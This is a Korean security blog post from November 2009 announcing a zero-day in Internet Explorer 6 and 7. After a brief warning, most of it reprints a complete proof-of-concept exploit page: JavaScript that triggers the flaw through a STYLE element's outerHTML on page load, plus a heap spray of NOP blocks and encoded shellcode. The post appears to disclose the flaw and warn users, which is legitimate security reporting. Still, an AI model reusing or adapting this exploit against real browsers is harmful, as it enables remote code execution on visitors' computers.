본문 바로가기
취약점소식

[MS]IE6, IE7 0-Day Exploit

by 잡다한 처리 2009. 11. 23.
반응형

지난 21일 Internet Explorer 6, 7 버전의 0-Day가 발견되었다.
이번 0-Day의 Exploit 코드는 다음과 같다.
아직 악성코드가 추가 된 코드는 확인하지 못하였지만, IE6, IE7의 취약점은 항상 악성코드에 접목되었기 때문에
사용자의 주의가 필요할 듯 하다.

<!--
securitylab.ir
K4mr4n_st (at) yahoo (dot) com [email concealed]
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml"> 
<HEAD>
<script> 
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1"; 
}
</script> 
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>

</HEAD> 
<BODY onload="load()">
</BODY>
</HTML>



 

댓글